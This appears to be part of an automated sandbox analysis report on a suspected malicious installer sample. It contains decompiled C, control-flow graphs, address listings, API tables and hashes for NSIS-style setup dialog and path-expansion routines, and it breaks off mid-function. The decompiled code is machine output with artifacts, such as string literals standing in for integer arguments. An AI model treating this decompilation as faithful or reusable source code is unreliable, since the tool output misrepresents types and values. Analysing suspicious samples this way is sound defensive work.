                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                  • String ID: Baptistisk Setup: Installing
                                                                                                                                                                                  • API String ID: 590372296-2312186561
                                                                                                                                                                                  • Opcode ID: 29ce8667bfeee4fe329dd275d65c9c3c39dbf4ae88fd507464117f79891065e4
                                                                                                                                                                                  • Instruction ID: b5f1ce2ce4d05df4ba5ebffd303825d409c0ca4f752acec20acacd4dcda6ac6e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 29ce8667bfeee4fe329dd275d65c9c3c39dbf4ae88fd507464117f79891065e4
                                                                                                                                                                                  • Instruction Fuzzy Hash: C9A14871900208BFEB119FA0DD89AAE7F79FB08354F10407AFA01BA1A0C7755E51DF69
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00403A41 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345windowstringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 179 403a41-403a53 180 403b94-403ba3 179->180 181 403a59-403a5f 179->181 183 403bf2-403c07 180->183 184 403ba5-403bed GetDlgItem * 2 call 403f14 SetClassLongA call 40140b 180->184 181->180 182 403a65-403a6e 181->182 185 403a70-403a7d SetWindowPos 182->185 186 403a83-403a86 182->186 188 403c47-403c4c call 403f60 183->188 189 403c09-403c0c 183->189 184->183 185->186 191 403aa0-403aa6 186->191 192 403a88-403a9a ShowWindow 186->192 197 403c51-403c6c 188->197 194 403c0e-403c19 call 401389 189->194 195 403c3f-403c41 189->195 198 403ac2-403ac5 191->198 199 403aa8-403abd DestroyWindow 191->199 192->191 194->195 210 403c1b-403c3a SendMessageA 194->210 195->188 196 403ee1 195->196 204 403ee3-403eea 196->204 202 403c75-403c7b 197->202 203 403c6e-403c70 call 40140b 197->203 207 403ac7-403ad3 SetWindowLongA 198->207 208 403ad8-403ade 198->208 205 403ebe-403ec4 199->205 213 403c81-403c8c 202->213 214 403e9f-403eb8 DestroyWindow EndDialog 202->214 203->202 205->196 211 403ec6-403ecc 205->211 207->204 215 403b81-403b8f call 403f7b 208->215 216 403ae4-403af5 GetDlgItem 208->216 210->204 211->196 218 403ece-403ed7 ShowWindow 211->218 213->214 219 403c92-403cdf call 405d51 call 403f14 * 3 GetDlgItem 213->219 214->205 215->204 220 403b14-403b17 216->220 221 403af7-403b0e SendMessageA IsWindowEnabled 216->221 218->196 249 403ce1-403ce6 219->249 250 403ce9-403d25 ShowWindow KiUserCallbackDispatcher call 403f36 EnableWindow 219->250 222 403b19-403b1a 220->222 223 403b1c-403b1f 220->223 221->196 221->220 226 403b4a-403b4f call 403eed 222->226 227 403b21-403b27 223->227 228 403b2d-403b32 223->228 226->215 230 403b68-403b7b SendMessageA 227->230 231 403b29-403b2b 227->231 228->230 232 403b34-403b3a 228->232 230->215 231->226 235 403b51-403b5a call 40140b 232->235 236 403b3c-403b42 call 40140b 232->236 235->215 245 403b5c-403b66 235->245 247 403b48 236->247 245->247 247->226 249->250 253 403d27-403d28 250->253 254 403d2a 250->254 255 403d2c-403d5a GetSystemMenu EnableMenuItem SendMessageA 253->255 254->255 256 403d5c-403d6d SendMessageA 255->256 257 403d6f 255->257 258 403d75-403dae call 403f49 call 405d2f lstrlenA call 405d51 SetWindowTextA call 401389 256->258 257->258 258->197 267 403db4-403db6 258->267 267->197 268 403dbc-403dc0 267->268 269 403dc2-403dc8 268->269 270 403ddf-403df3 DestroyWindow 268->270 269->196 271 403dce-403dd4 269->271 270->205 272 403df9-403e26 CreateDialogParamA 270->272 271->197 273 403dda 271->273 272->205 274 403e2c-403e83 call 403f14 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 272->274 273->196 274->196 279 403e85-403e98 ShowWindow call 403f60 274->279 281 403e9d 279->281 281->205
                                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                                  			E00403A41(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x429850 = _t35;
					if(_t115 == 0x110) {
						 *0x42e408 = _t125;
						 *0x429864 = GetDlgItem(_t125, "true");
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x428830 = _t91;
						E00403F14(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42dbe8);
						 *0x42dbcc = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x429850 = 1;
					}
					_t122 =  *0x4091dc; // 0x0
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42e420;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403F60(0x40b);
						while(1) {
							_t37 =  *0x429850;
							 *0x4091dc =  *0x4091dc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091dc; // 0x0
							__eflags = _t39 -  *0x42e424;
							if(_t39 ==  *0x42e424) {
								E0040140B("true");
							}
							__eflags =  *0x42dbcc - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x4091dc -  *0x42e424; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405D51(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403F14(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403F14(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403F14(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42e48c - _t133;
							_v32 = _t49;
							if( *0x42e48c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008); // executed
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100); // executed
							E00403F36(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x428830, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push("true");
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, "true");
							__eflags =  *0x42e48c - _t133;
							if( *0x42e48c == _t133) {
								_push( *0x429864);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x428830);
							}
							E00403F49();
							E00405D2F(0x429868, "Baptistisk Setup");
							E00405D51(0x429868, _t125, _t130,  &(0x429868[lstrlenA(0x429868)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x429868); // executed
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42dbd8); // executed
									 *0x429040 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42e400,  *_t130 +  *0x42dbe0 & 0x0000ffff, _t125,  *( *(_t130 + 4) * 4 + "]@@"), _t130); // executed
									__eflags = _t73 - _t133;
									 *0x42dbd8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403F14(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42dbd8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42dbcc - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42dbd8, 8); // executed
									E00403F60(0x405);
									goto L58;
								}
								__eflags =  *0x42e48c - _t133;
								if( *0x42e48c != _t133) {
									goto L61;
								}
								__eflags =  *0x42e480 - _t133;
								if( *0x42e480 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42dbd8);
						 *0x42e408 = _t133;
						EndDialog(_t125,  *0x428c38);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42dbd8, 0x40f, 0, "true");
						__eflags =  *0x42dbcc - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x429848, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x429848,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F7B(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42dbd8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42e48c - _t133;
										if( *0x42e48c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x428c38 = 1;
											L21:
											_push(0x78);
											L22:
											E00403EED();
											goto L26;
										}
										E0040140B(_t127);
										 *0x428c38 = _t127;
										goto L21;
									}
									__eflags =  *0x4091dc - _t133; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42dbd8);
						 *0x42dbd8 = _a12;
						L58:
						if( *0x42a868 == _t133) {
							_t142 =  *0x42dbd8 - _t133; // 0x103c8
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa); // executed
								 *0x42a868 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                                                                                                                                                  0x00403a4a
                                                                                                                                                                                  0x00403a53
                                                                                                                                                                                  0x00403b94
                                                                                                                                                                                  0x00403b98
                                                                                                                                                                                  0x00403b9c
                                                                                                                                                                                  0x00403b9e
                                                                                                                                                                                  0x00403ba3
                                                                                                                                                                                  0x00403bae
                                                                                                                                                                                  0x00403bb9
                                                                                                                                                                                  0x00403bbe
                                                                                                                                                                                  0x00403bc0
                                                                                                                                                                                  0x00403bc2
                                                                                                                                                                                  0x00403bc5
                                                                                                                                                                                  0x00403bca
                                                                                                                                                                                  0x00403bd8
                                                                                                                                                                                  0x00403be5
                                                                                                                                                                                  0x00403bec
                                                                                                                                                                                  0x00403bec
                                                                                                                                                                                  0x00403bed
                                                                                                                                                                                  0x00403bed
                                                                                                                                                                                  0x00403bf2
                                                                                                                                                                                  0x00403bf8
                                                                                                                                                                                  0x00403bff
                                                                                                                                                                                  0x00403c05
                                                                                                                                                                                  0x00403c07
                                                                                                                                                                                  0x00403c47
                                                                                                                                                                                  0x00403c4c
                                                                                                                                                                                  0x00403c51
                                                                                                                                                                                  0x00403c51
                                                                                                                                                                                  0x00403c56
                                                                                                                                                                                  0x00403c5f
                                                                                                                                                                                  0x00403c61
                                                                                                                                                                                  0x00403c66
                                                                                                                                                                                  0x00403c6c
                                                                                                                                                                                  0x00403c70
                                                                                                                                                                                  0x00403c70
                                                                                                                                                                                  0x00403c75
                                                                                                                                                                                  0x00403c7b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403c86
                                                                                                                                                                                  0x00403c8c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403c95
                                                                                                                                                                                  0x00403c9d
                                                                                                                                                                                  0x00403ca2
                                                                                                                                                                                  0x00403ca5
                                                                                                                                                                                  0x00403cab
                                                                                                                                                                                  0x00403cb0
                                                                                                                                                                                  0x00403cb3
                                                                                                                                                                                  0x00403cb9
                                                                                                                                                                                  0x00403cbe
                                                                                                                                                                                  0x00403cc1
                                                                                                                                                                                  0x00403cc7
                                                                                                                                                                                  0x00403ccf
                                                                                                                                                                                  0x00403cd5
                                                                                                                                                                                  0x00403cdb
                                                                                                                                                                                  0x00403cdf
                                                                                                                                                                                  0x00403ce6
                                                                                                                                                                                  0x00403ce6
                                                                                                                                                                                  0x00403ce6
                                                                                                                                                                                  0x00403cf0
                                                                                                                                                                                  0x00403d02
                                                                                                                                                                                  0x00403d0e
                                                                                                                                                                                  0x00403d13
                                                                                                                                                                                  0x00403d1d
                                                                                                                                                                                  0x00403d23
                                                                                                                                                                                  0x00403d25
                                                                                                                                                                                  0x00403d2a
                                                                                                                                                                                  0x00403d27
                                                                                                                                                                                  0x00403d27
                                                                                                                                                                                  0x00403d27
                                                                                                                                                                                  0x00403d3a
                                                                                                                                                                                  0x00403d52
                                                                                                                                                                                  0x00403d54
                                                                                                                                                                                  0x00403d5a
                                                                                                                                                                                  0x00403d6f
                                                                                                                                                                                  0x00403d5c
                                                                                                                                                                                  0x00403d65
                                                                                                                                                                                  0x00403d67
                                                                                                                                                                                  0x00403d67
                                                                                                                                                                                  0x00403d75
                                                                                                                                                                                  0x00403d85
                                                                                                                                                                                  0x00403d96
                                                                                                                                                                                  0x00403d9d
                                                                                                                                                                                  0x00403da3
                                                                                                                                                                                  0x00403da7
                                                                                                                                                                                  0x00403dac
                                                                                                                                                                                  0x00403dae
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403db4
                                                                                                                                                                                  0x00403db4
                                                                                                                                                                                  0x00403db6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403dbc
                                                                                                                                                                                  0x00403dc0
                                                                                                                                                                                  0x00403de5
                                                                                                                                                                                  0x00403deb
                                                                                                                                                                                  0x00403df1
                                                                                                                                                                                  0x00403df3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403e19
                                                                                                                                                                                  0x00403e1f
                                                                                                                                                                                  0x00403e21
                                                                                                                                                                                  0x00403e26
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403e2c
                                                                                                                                                                                  0x00403e2f
                                                                                                                                                                                  0x00403e32
                                                                                                                                                                                  0x00403e49
                                                                                                                                                                                  0x00403e55
                                                                                                                                                                                  0x00403e6e
                                                                                                                                                                                  0x00403e74
                                                                                                                                                                                  0x00403e78
                                                                                                                                                                                  0x00403e7d
                                                                                                                                                                                  0x00403e83
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403e8d
                                                                                                                                                                                  0x00403e98
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403e98
                                                                                                                                                                                  0x00403dc2
                                                                                                                                                                                  0x00403dc8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403dce
                                                                                                                                                                                  0x00403dd4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403dda
                                                                                                                                                                                  0x00403dae
                                                                                                                                                                                  0x00403ea5
                                                                                                                                                                                  0x00403eb1
                                                                                                                                                                                  0x00403eb8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403c09
                                                                                                                                                                                  0x00403c09
                                                                                                                                                                                  0x00403c0c
                                                                                                                                                                                  0x00403c3f
                                                                                                                                                                                  0x00403c3f
                                                                                                                                                                                  0x00403c41
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403c41
                                                                                                                                                                                  0x00403c0e
                                                                                                                                                                                  0x00403c12
                                                                                                                                                                                  0x00403c17
                                                                                                                                                                                  0x00403c19
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403c29
                                                                                                                                                                                  0x00403c31
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403c37
                                                                                                                                                                                  0x00403a65
                                                                                                                                                                                  0x00403a65
                                                                                                                                                                                  0x00403a69
                                                                                                                                                                                  0x00403a6e
                                                                                                                                                                                  0x00403a7d
                                                                                                                                                                                  0x00403a7d
                                                                                                                                                                                  0x00403a86
                                                                                                                                                                                  0x00403a8f
                                                                                                                                                                                  0x00403a9a
                                                                                                                                                                                  0x00403a9a
                                                                                                                                                                                  0x00403aa6
                                                                                                                                                                                  0x00403ac2
                                                                                                                                                                                  0x00403ac5
                                                                                                                                                                                  0x00403ad8
                                                                                                                                                                                  0x00403ade
                                                                                                                                                                                  0x00403b81
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403b8a
                                                                                                                                                                                  0x00403ae4
                                                                                                                                                                                  0x00403af1
                                                                                                                                                                                  0x00403af3
                                                                                                                                                                                  0x00403af5
                                                                                                                                                                                  0x00403b14
                                                                                                                                                                                  0x00403b14
                                                                                                                                                                                  0x00403b17
                                                                                                                                                                                  0x00403b1c
                                                                                                                                                                                  0x00403b1f
                                                                                                                                                                                  0x00403b2f
                                                                                                                                                                                  0x00403b30
                                                                                                                                                                                  0x00403b32
                                                                                                                                                                                  0x00403b68
                                                                                                                                                                                  0x00403b7b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403b7b
                                                                                                                                                                                  0x00403b34
                                                                                                                                                                                  0x00403b3a
                                                                                                                                                                                  0x00403b53
                                                                                                                                                                                  0x00403b58
                                                                                                                                                                                  0x00403b5a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403b5c
                                                                                                                                                                                  0x00403b48
                                                                                                                                                                                  0x00403b48
                                                                                                                                                                                  0x00403b4a
                                                                                                                                                                                  0x00403b4a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403b4a
                                                                                                                                                                                  0x00403b3d
                                                                                                                                                                                  0x00403b42
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403b42
                                                                                                                                                                                  0x00403b21
                                                                                                                                                                                  0x00403b27
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403b29
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403b29
                                                                                                                                                                                  0x00403b19
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403b19
                                                                                                                                                                                  0x00403aff
                                                                                                                                                                                  0x00403b06
                                                                                                                                                                                  0x00403b0c
                                                                                                                                                                                  0x00403b0e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403b0e
                                                                                                                                                                                  0x00403aca
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403aa8
                                                                                                                                                                                  0x00403aae
                                                                                                                                                                                  0x00403ab8
                                                                                                                                                                                  0x00403ebe
                                                                                                                                                                                  0x00403ec4
                                                                                                                                                                                  0x00403ec6
                                                                                                                                                                                  0x00403ecc
                                                                                                                                                                                  0x00403ed1
                                                                                                                                                                                  0x00403ed7
                                                                                                                                                                                  0x00403ed7
                                                                                                                                                                                  0x00403ecc
                                                                                                                                                                                  0x00403ee1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403ee1
                                                                                                                                                                                  0x00403aa6

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
                                                                                                                                                                                  • ShowWindow.USER32(?), ref: 00403A9A
                                                                                                                                                                                  • DestroyWindow.USER32 ref: 00403AAE
                                                                                                                                                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403AEB
                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403B06
                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403BB4
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403BBE
                                                                                                                                                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
                                                                                                                                                                                  • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403C29
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403CCF
                                                                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403CF0
                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
                                                                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403D1D
                                                                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403D33
                                                                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00403D3A
                                                                                                                                                                                  • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403D52
                                                                                                                                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
                                                                                                                                                                                  • lstrlenA.KERNEL32(Baptistisk Setup: Installing,?,Baptistisk Setup: Installing,Baptistisk Setup), ref: 00403D8E
                                                                                                                                                                                  • SetWindowTextA.USER32(?,Baptistisk Setup: Installing), ref: 00403D9D
                                                                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 00403ED1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                  • String ID: Baptistisk Setup$Baptistisk Setup: Installing
                                                                                                                                                                                  • API String ID: 3282139019-1586414041
                                                                                                                                                                                  • Opcode ID: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                                                                                                                                  • Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
                                                                                                                                                                                  • Opcode Fuzzy Hash: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00405D51 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199stringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 423 405d51-405d5c 424 405d5e-405d6d 423->424 425 405d6f-405d84 423->425 424->425 426 405f77-405f7b 425->426 427 405d8a-405d95 425->427 428 405f81-405f8b 426->428 429 405da7-405db1 426->429 427->426 430 405d9b-405da2 427->430 431 405f96-405f97 428->431 432 405f8d-405f91 call 405d2f 428->432 429->428 433 405db7-405dbe 429->433 430->426 432->431 435 405dc4-405df9 433->435 436 405f6a 433->436 437 405f14-405f17 435->437 438 405dff-405e0a GetVersion 435->438 439 405f74-405f76 436->439 440 405f6c-405f72 436->440 443 405f47-405f4a 437->443 444 405f19-405f1c 437->444 441 405e24 438->441 442 405e0c-405e10 438->442 439->426 440->426 448 405e2b-405e32 441->448 442->441 445 405e12-405e16 442->445 449 405f58-405f68 lstrlenA 443->449 450 405f4c-405f53 call 405d51 443->450 446 405f2c-405f38 call 405d2f 444->446 447 405f1e-405f2a call 405c8d 444->447 445->441 451 405e18-405e1c 445->451 461 405f3d-405f43 446->461 447->461 453 405e34-405e36 448->453 454 405e37-405e39 448->454 449->426 450->449 451->441 457 405e1e-405e22 451->457 453->454 459 405e72-405e75 454->459 460 405e3b-405e56 call 405c16 454->460 457->448 464 405e85-405e88 459->464 465 405e77-405e83 GetSystemDirectoryA 459->465 469 405e5b-405e5e 460->469 461->449 463 405f45 461->463 470 405f0c-405f12 call 405f9a 463->470 467 405ef2-405ef4 464->467 468 405e8a-405e98 GetWindowsDirectoryA 464->468 466 405ef6-405ef9 465->466 466->470 473 405efb-405eff 466->473 467->466 471 405e9a-405ea4 467->471 468->467 472 405e64-405e6d call 405d51 469->472 469->473 470->449 476 405ea6-405ea9 471->476 477 405ebe-405ed4 SHGetSpecialFolderLocation 471->477 472->466 473->470 479 405f01-405f07 lstrcatA 473->479 476->477 480 405eab-405eb2 476->480 481 405ed6-405eed SHGetPathFromIDListA CoTaskMemFree 477->481 482 405eef 477->482 479->470 484 405eba-405ebc 480->484 481->466 481->482 482->467 484->466 484->477
                                                                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                                                                  			E00405D51(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t37;
				CHAR* _t38;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t70;
				signed int _t75;
				signed int _t76;
				intOrPtr _t80;
				char _t82;
				void* _t86;
				CHAR* _t87;
				void* _t89;
				signed int _t96;
				signed int _t98;
				void* _t99;

				_t89 = __esi;
				_t86 = __edi;
				_t64 = __ebx;
				_t37 = _a8;
				if(_t37 < 0) {
					_t80 =  *0x42dbdc; // 0x73cfd8
					_t37 =  *(_t80 - 4 + _t37 * 4);
				}
				_push(_t64);
				_t75 =  *0x42e438 + _t37;
				_t38 = 0x42d3a0;
				_push(_t89);
				_push(_t86);
				_t87 = 0x42d3a0;
